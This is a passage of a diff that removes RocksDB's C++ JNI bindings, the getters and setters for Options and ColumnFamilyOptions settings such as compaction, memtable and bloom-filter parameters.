-  reinterpret_cast<rocksdb::Options*>(jhandle)->target_file_size_base =
-      static_cast<uint64_t>(jtarget_file_size_base);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    targetFileSizeMultiplier
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_targetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->target_file_size_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setTargetFileSizeMultiplier
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setTargetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jtarget_file_size_multiplier) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->target_file_size_multiplier =
-          static_cast<int>(jtarget_file_size_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBytesForLevelBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_bytes_for_level_base;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBytesForLevelBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_bytes_for_level_base) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_bytes_for_level_base =
-          static_cast<int64_t>(jmax_bytes_for_level_base);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelCompactionDynamicLevelBytes
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_levelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level_compaction_dynamic_level_bytes;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelCompactionDynamicLevelBytes
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setLevelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_dynamic_level_bytes) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level_compaction_dynamic_level_bytes =
-          (jenable_dynamic_level_bytes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBytesForLevelMultiplier
- * Signature: (J)D
- */
-jdouble Java_org_rocksdb_Options_maxBytesForLevelMultiplier(JNIEnv* env,
-                                                            jobject jobj,
-                                                            jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_bytes_for_level_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBytesForLevelMultiplier
- * Signature: (JD)V
- */
-void Java_org_rocksdb_Options_setMaxBytesForLevelMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmax_bytes_for_level_multiplier) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_bytes_for_level_multiplier =
-      static_cast<double>(jmax_bytes_for_level_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxCompactionBytes
- * Signature: (J)I
- */
-jlong Java_org_rocksdb_Options_maxCompactionBytes(JNIEnv* env, jobject jobj,
-                                                  jlong jhandle) {
-  return static_cast<jlong>(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->max_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxCompactionBytes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxCompactionBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_compaction_bytes) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_compaction_bytes =
-      static_cast<uint64_t>(jmax_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    arenaBlockSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_arenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->arena_block_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setArenaBlockSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setArenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jarena_block_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jarena_block_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->arena_block_size =
-        jarena_block_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    disableAutoCompactions
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_disableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->disable_auto_compactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDisableAutoCompactions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setDisableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jdisable_auto_compactions) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->disable_auto_compactions =
-          static_cast<bool>(jdisable_auto_compactions);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxSequentialSkipInIterations
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_sequential_skip_in_iterations;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxSequentialSkipInIterations
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_sequential_skip_in_iterations) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_sequential_skip_in_iterations =
-          static_cast<int64_t>(jmax_sequential_skip_in_iterations);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    inplaceUpdateSupport
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_inplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->inplace_update_support;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setInplaceUpdateSupport
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setInplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jinplace_update_support) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->inplace_update_support =
-          static_cast<bool>(jinplace_update_support);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    inplaceUpdateNumLocks
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_inplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->inplace_update_num_locks;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setInplaceUpdateNumLocks
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setInplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jinplace_update_num_locks) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jinplace_update_num_locks);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->inplace_update_num_locks =
-        jinplace_update_num_locks;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    memtablePrefixBloomSizeRatio
- * Signature: (J)I
- */
-jdouble Java_org_rocksdb_Options_memtablePrefixBloomSizeRatio(JNIEnv* env,
-                                                              jobject jobj,
-                                                              jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMemtablePrefixBloomSizeRatio
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMemtablePrefixBloomSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmemtable_prefix_bloom_size_ratio) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio =
-      static_cast<double>(jmemtable_prefix_bloom_size_ratio);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    bloomLocality
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_bloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->bloom_locality;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBloomLocality
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setBloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jbloom_locality) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->bloom_locality =
-      static_cast<int32_t>(jbloom_locality);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxSuccessiveMerges
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_successive_merges;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxSuccessiveMerges
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_successive_merges) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmax_successive_merges);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->max_successive_merges =
-        jmax_successive_merges;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeFiltersForHits
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_optimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->optimize_filters_for_hits;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setOptimizeFiltersForHits
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setOptimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean joptimize_filters_for_hits) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->optimize_filters_for_hits =
-          static_cast<bool>(joptimize_filters_for_hits);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeForSmallDb
- * Signature: (J)V
- */
-void Java_org_rocksdb_Options_optimizeForSmallDb(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->OptimizeForSmallDb();
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeForPointLookup
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_optimizeForPointLookup(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong block_cache_size_mb) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      OptimizeForPointLookup(block_cache_size_mb);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeLevelStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_optimizeLevelStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      OptimizeLevelStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeUniversalStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_optimizeUniversalStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      OptimizeUniversalStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    prepareForBulkLoad
- * Signature: (J)V
- */
-void Java_org_rocksdb_Options_prepareForBulkLoad(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      PrepareForBulkLoad();
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    memtableHugePageSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_memtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->memtable_huge_page_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMemtableHugePageSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMemtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmemtable_huge_page_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmemtable_huge_page_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(
-        jhandle)->memtable_huge_page_size =
-            jmemtable_huge_page_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    softPendingCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_softPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->soft_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setSoftPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setSoftPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jsoft_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->soft_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jsoft_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    softHardCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_hardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->hard_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setHardPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setHardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jhard_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->hard_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jhard_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    level0FileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_level0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-    jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevel0FileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevel0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int32_t>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    level0SlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_level0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-    jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevel0SlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevel0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int32_t>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    level0StopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_level0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-    jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevel0StopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevel0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_stop_writes_trigger =
-          static_cast<int32_t>(jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBytesForLevelMultiplierAdditional
- * Signature: (J)[I
- */
-jintArray Java_org_rocksdb_Options_maxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto mbflma =
-      reinterpret_cast<rocksdb::Options*>(jhandle)->
-          max_bytes_for_level_multiplier_additional;
-
-  const size_t size = mbflma.size();
-
-  jint* additionals = new jint[size];
-  for (size_t i = 0; i < size; i++) {
-    additionals[i] = static_cast<jint>(mbflma[i]);
-  }
-
-  jsize jlen = static_cast<jsize>(size);
-  jintArray result = env->NewIntArray(jlen);
-  if(result == nullptr) {
-      // exception thrown: OutOfMemoryError
-      delete [] additionals;
-      return nullptr;
-  }
-
-  env->SetIntArrayRegion(result, 0, jlen, additionals);
-  if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(result);
-      delete [] additionals;
-      return nullptr;
-  }
-
-  delete [] additionals;
-
-  return result;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBytesForLevelMultiplierAdditional
- * Signature: (J[I)V
- */
-void Java_org_rocksdb_Options_setMaxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jintArray jmax_bytes_for_level_multiplier_additional) {
-  jsize len = env->GetArrayLength(jmax_bytes_for_level_multiplier_additional);
-  jint *additionals =
-      env->GetIntArrayElements(jmax_bytes_for_level_multiplier_additional, nullptr);
-  if(additionals == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->max_bytes_for_level_multiplier_additional.clear();
-  for (jsize i = 0; i < len; i++) {
-    opt->max_bytes_for_level_multiplier_additional.push_back(static_cast<int32_t>(additionals[i]));
-  }
-
-  env->ReleaseIntArrayElements(jmax_bytes_for_level_multiplier_additional,
-      additionals, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    paranoidFileChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_paranoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->paranoid_file_checks;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setParanoidFileChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setParanoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jparanoid_file_checks) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->paranoid_file_checks =
-          static_cast<bool>(jparanoid_file_checks);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionPriority
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setCompactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyte jcompaction_priority_value) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->compaction_pri =
-      rocksdb::CompactionPriorityJni::toCppCompactionPriority(jcompaction_priority_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compactionPriority
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_compactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::CompactionPriorityJni::toJavaCompactionPriority(
-      opts->compaction_pri);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setReportBgIoStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setReportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jreport_bg_io_stats) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->report_bg_io_stats = static_cast<bool>(jreport_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    reportBgIoStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_reportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<bool>(opts->report_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionOptionsUniversal
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompactionOptionsUniversal(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompaction_options_universal_handle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* opts_uni =
-      reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(
-          jcompaction_options_universal_handle);
-  opts->compaction_options_universal = *opts_uni;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionOptionsFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompactionOptionsFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_options_fifo_handle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* opts_fifo =
-      reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(
-          jcompaction_options_fifo_handle);
-  opts->compaction_options_fifo = *opts_fifo;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setForceConsistencyChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setForceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jforce_consistency_checks) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->force_consistency_checks = static_cast<bool>(jforce_consistency_checks);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    forceConsistencyChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_forceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<bool>(opts->force_consistency_checks);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::ColumnFamilyOptions
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    newColumnFamilyOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_newColumnFamilyOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* op = new rocksdb::ColumnFamilyOptions();
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    getColumnFamilyOptionsFromProps
- * Signature: (Ljava/util/String;)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_getColumnFamilyOptionsFromProps(
-    JNIEnv* env, jclass jclazz, jstring jopt_string) {
-  const char* opt_string = env->GetStringUTFChars(jopt_string, nullptr);
-  if(opt_string == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* cf_options = new rocksdb::ColumnFamilyOptions();
-  rocksdb::Status status = rocksdb::GetColumnFamilyOptionsFromString(
-      rocksdb::ColumnFamilyOptions(), opt_string, cf_options);
-
-  env->ReleaseStringUTFChars(jopt_string, opt_string);
-
-  // Check if ColumnFamilyOptions creation was possible.
-  jlong ret_value = 0;
-  if (status.ok()) {
-    ret_value = reinterpret_cast<jlong>(cf_options);
-  } else {
-    // if operation failed the ColumnFamilyOptions need to be deleted
-    // again to prevent a memory leak.
-    delete cf_options;
-  }
-  return ret_value;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* cfo = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(handle);
-  assert(cfo != nullptr);
-  delete cfo;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeForSmallDb
- * Signature: (J)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeForSmallDb(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeForSmallDb();
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeForPointLookup
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeForPointLookup(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong block_cache_size_mb) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeForPointLookup(block_cache_size_mb);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeLevelStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeLevelStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeLevelStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeUniversalStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeUniversalStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeUniversalStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setComparatorHandle
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setComparatorHandle__JI(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint builtinComparator) {
-  switch (builtinComparator) {
-    case 1:
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->comparator =
-          rocksdb::ReverseBytewiseComparator();
-      break;
-    default:
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->comparator =
-          rocksdb::BytewiseComparator();
-      break;
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setComparatorHandle
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setComparatorHandle__JJ(
-    JNIEnv* env, jobject jobj, jlong jopt_handle, jlong jcomparator_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jopt_handle)->comparator =
-      reinterpret_cast<rocksdb::Comparator*>(jcomparator_handle);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMergeOperatorName
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMergeOperatorName(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jop_name) {
-  auto* options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  const char* op_name = env->GetStringUTFChars(jop_name, nullptr);
-  if(op_name == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  options->merge_operator =
-      rocksdb::MergeOperators::CreateFromStringId(op_name);
-  env->ReleaseStringUTFChars(jop_name, op_name);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMergeOperator
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMergeOperator(
-  JNIEnv* env, jobject jobj, jlong jhandle, jlong mergeOperatorHandle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->merge_operator =
-    *(reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>*>
-      (mergeOperatorHandle));
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionFilterHandle
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionFilterHandle(
-    JNIEnv* env, jobject jobj, jlong jopt_handle,
-    jlong jcompactionfilter_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jopt_handle)->
